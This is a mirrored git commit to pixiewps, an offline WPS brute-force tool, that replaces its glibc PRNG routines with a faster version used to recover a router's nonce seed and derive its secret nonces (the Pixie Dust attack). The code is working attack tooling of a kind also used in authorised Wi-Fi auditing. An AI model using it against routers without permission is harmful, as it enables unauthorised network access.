mirror of
https://github.com/wiire-a/pixiewps.git
synced 2025-07-29 08:45:14 +02:00
Implemented faster glibc random function
The glibc random function has been rewritten is a simpler manner which should make it faster to execute. Possibly up to a x2 increase in speed.
This commit is contained in:
parent
8b7b4b3172
commit
ceea7143cb
68
src/glibc_random.c
Normal file
68
src/glibc_random.c
Normal file
@ -0,0 +1,68 @@
|
|||||||
|
/*
|
||||||
|
* pixiewps: offline WPS brute-force utility that exploits low entropy PRNGs
|
||||||
|
*
|
||||||
|
* Copyright (c) 2015-2017, wiire <wi7ire@gmail.com>
|
||||||
|
* SPDX-License-Identifier: GPL-3.0+
|
||||||
|
*
|
||||||
|
* This program is free software: you can redistribute it and/or modify
|
||||||
|
* it under the terms of the GNU General Public License as published by
|
||||||
|
* the Free Software Foundation, either version 3 of the License, or
|
||||||
|
* (at your option) any later version.
|
||||||
|
*
|
||||||
|
* This program is distributed in the hope that it will be useful,
|
||||||
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
* GNU General Public License for more details.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#define GLIBC_PRNG_SIZE 344
|
||||||
|
#define GLIBC_FAST_MAX_GEN 3
|
||||||
|
|
||||||
|
#if GLIBC_MAX_GEN < GLIBC_FAST_MAX_GEN
|
||||||
|
#error "GLIBC_MAX_GEN must be >= GLIBC_FAST_MAX_GEN"
|
||||||
|
#endif
|
||||||
|
|
||||||
|
/*
|
||||||
|
* The +1 is used to keep the index inside the array after the increment,
|
||||||
|
* it doesn't really have a purpose besides that
|
||||||
|
*/
|
||||||
|
struct glibc_prng {
|
||||||
|
int index;
|
||||||
|
int state[GLIBC_PRNG_SIZE + GLIBC_MAX_GEN - GLIBC_FAST_MAX_GEN + 1];
|
||||||
|
};
|
||||||
|
|
||||||
|
/*
|
||||||
|
* If only 3 numbers are generated then there's no need to store new values
|
||||||
|
*/
|
||||||
|
unsigned int glibc_rand_fast(struct glibc_prng *prng)
|
||||||
|
{
|
||||||
|
const int *state = prng->state;
|
||||||
|
const int i = prng->index++;
|
||||||
|
return ((unsigned int)(state[i - 31] + state[i - 3])) >> 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
/*
|
||||||
|
* There are no checks of bounds (GLIBC_MAX_GEN is the maximum number of times it can be called)
|
||||||
|
*/
|
||||||
|
unsigned int glibc_rand(struct glibc_prng *prng)
|
||||||
|
{
|
||||||
|
int *state = prng->state;
|
||||||
|
const int i = prng->index++;
|
||||||
|
state[i] = state[i - 31] + state[i - 3];
|
||||||
|
return (unsigned int)state[i] >> 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
void glibc_seed(struct glibc_prng *prng, int seed)
|
||||||
|
{
|
||||||
|
int i;
|
||||||
|
int *state = prng->state;
|
||||||
|
prng->index = GLIBC_PRNG_SIZE;
|
||||||
|
state[0] = seed;
|
||||||
|
for (i = 1; i < 31; i++) {
|
||||||
|
state[i] = (16807LL * state[i - 1]) % 2147483647;
|
||||||
|
if (state[i] < 0)
|
||||||
|
state[i] += 2147483647;
|
||||||
|
}
|
||||||
|
for (i = 31; i < 34; i++) state[i] = state[i - 31];
|
||||||
|
for (i = 34; i < 344; i++) state[i] = state[i - 31] + state[i - 3];
|
||||||
|
}
|
@ -39,9 +39,11 @@
|
|||||||
#include "crypto/aes-cbc.c"
|
#include "crypto/aes-cbc.c"
|
||||||
#include "utils.h"
|
#include "utils.h"
|
||||||
#include "wps.h"
|
#include "wps.h"
|
||||||
#include "random_r.c"
|
|
||||||
#include "version.h"
|
#include "version.h"
|
||||||
|
|
||||||
|
#define GLIBC_MAX_GEN 4
|
||||||
|
#include "glibc_random.c"
|
||||||
|
|
||||||
uint32_t ecos_rand_simplest(uint32_t *seed);
|
uint32_t ecos_rand_simplest(uint32_t *seed);
|
||||||
uint32_t ecos_rand_simple(uint32_t *seed);
|
uint32_t ecos_rand_simple(uint32_t *seed);
|
||||||
uint32_t ecos_rand_knuth(uint32_t *seed);
|
uint32_t ecos_rand_knuth(uint32_t *seed);
|
||||||
@ -90,25 +92,21 @@ static struct job_control {
|
|||||||
} job_control;
|
} job_control;
|
||||||
|
|
||||||
static void *crack_thread(void *arg) {
|
static void *crack_thread(void *arg) {
|
||||||
|
struct glibc_prng glibc_prng;
|
||||||
struct crack_job *j = arg;
|
struct crack_job *j = arg;
|
||||||
struct m_random_data buf = {0};
|
|
||||||
char rand_statebuf[128] = {0};
|
|
||||||
|
|
||||||
uint32_t seed = j->start;
|
uint32_t seed = j->start;
|
||||||
uint32_t limit = job_control.end;
|
uint32_t limit = job_control.end;
|
||||||
m_initstate_r(seed, rand_statebuf, &buf);
|
|
||||||
int32_t res = 0;
|
|
||||||
|
|
||||||
while (!job_control.nonce_seed) {
|
while (!job_control.nonce_seed) {
|
||||||
m_srandom_r(seed, &buf);
|
|
||||||
unsigned int i;
|
unsigned int i;
|
||||||
for (i = 0; i < 4; i++) {
|
glibc_seed(&glibc_prng, seed);
|
||||||
m_random_r(&buf, &res);
|
for (i = 0; i < GLIBC_FAST_MAX_GEN; i++) {
|
||||||
if ((uint32_t) res != job_control.randr_enonce[i])
|
const unsigned int res = glibc_rand_fast(&glibc_prng);
|
||||||
|
if (res != job_control.randr_enonce[i])
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (i == 4) {
|
if (i == GLIBC_FAST_MAX_GEN) {
|
||||||
job_control.nonce_seed = seed;
|
job_control.nonce_seed = seed;
|
||||||
DEBUG_PRINT("Seed found %u", seed);
|
DEBUG_PRINT("Seed found %u", seed);
|
||||||
}
|
}
|
||||||
@ -893,9 +891,7 @@ usage_err:
|
|||||||
|
|
||||||
nonce_seed = collect_crack_jobs();
|
nonce_seed = collect_crack_jobs();
|
||||||
|
|
||||||
struct m_random_data *buf = calloc(1, sizeof(struct m_random_data));
|
struct glibc_prng glibc_prng;
|
||||||
char *rand_statebuf = calloc(1, 128);
|
|
||||||
m_initstate_r(nonce_seed, rand_statebuf, buf);
|
|
||||||
|
|
||||||
if (nonce_seed) { /* Seed found */
|
if (nonce_seed) { /* Seed found */
|
||||||
int32_t res;
|
int32_t res;
|
||||||
@ -906,11 +902,10 @@ usage_err:
|
|||||||
|
|
||||||
do {
|
do {
|
||||||
i++;
|
i++;
|
||||||
m_srandom_r(nonce_seed + i, buf);
|
glibc_seed(&glibc_prng, nonce_seed + i);
|
||||||
for (uint_fast8_t j = 0; j < 4; j++) {
|
for (uint_fast8_t j = 0; j < GLIBC_MAX_GEN; j++) {
|
||||||
m_random_r(buf, &res);
|
uint32_t be = h32_to_be(glibc_rand(&glibc_prng));
|
||||||
uint32_t be = h32_to_be(res);
|
memcpy(&(wps->e_s1[4 * j]), &be, sizeof(uint32_t));
|
||||||
memcpy(&(wps->e_s1[4 * j]), &be, 4);
|
|
||||||
memcpy(wps->e_s2, wps->e_s1, WPS_SECRET_NONCE_LEN); /* E-S1 = E-S2 != E-Nonce */
|
memcpy(wps->e_s2, wps->e_s1, WPS_SECRET_NONCE_LEN); /* E-S1 = E-S2 != E-Nonce */
|
||||||
}
|
}
|
||||||
s1_seed = nonce_seed + i;
|
s1_seed = nonce_seed + i;
|
||||||
@ -959,11 +954,10 @@ usage_err:
|
|||||||
i = 0;
|
i = 0;
|
||||||
do {
|
do {
|
||||||
i++;
|
i++;
|
||||||
m_srandom_r(nonce_seed - i, buf);
|
glibc_seed(&glibc_prng, nonce_seed - i);
|
||||||
for (uint_fast8_t j = 0; j < 4; j++) {
|
for (uint_fast8_t j = 0; j < GLIBC_MAX_GEN; j++) {
|
||||||
m_random_r(buf, &res);
|
uint32_t be = h32_to_be(glibc_rand(&glibc_prng));
|
||||||
uint32_t be = h32_to_be(res);
|
memcpy(&(wps->e_s1[4 * j]), &be, sizeof(uint32_t));
|
||||||
memcpy(&(wps->e_s1[4 * j]), &be, 4);
|
|
||||||
memcpy(wps->e_s2, wps->e_s1, WPS_SECRET_NONCE_LEN); /* E-S1 = E-S2 != E-Nonce */
|
memcpy(wps->e_s2, wps->e_s1, WPS_SECRET_NONCE_LEN); /* E-S1 = E-S2 != E-Nonce */
|
||||||
}
|
}
|
||||||
s1_seed = nonce_seed - i;
|
s1_seed = nonce_seed - i;
|
||||||
@ -1016,9 +1010,6 @@ usage_err:
|
|||||||
snprintf(wps->warning, 256, " [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.\n\n");
|
snprintf(wps->warning, 256, " [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.\n\n");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
free(buf);
|
|
||||||
free(rand_statebuf);
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
Loading…
x
Reference in New Issue
Block a user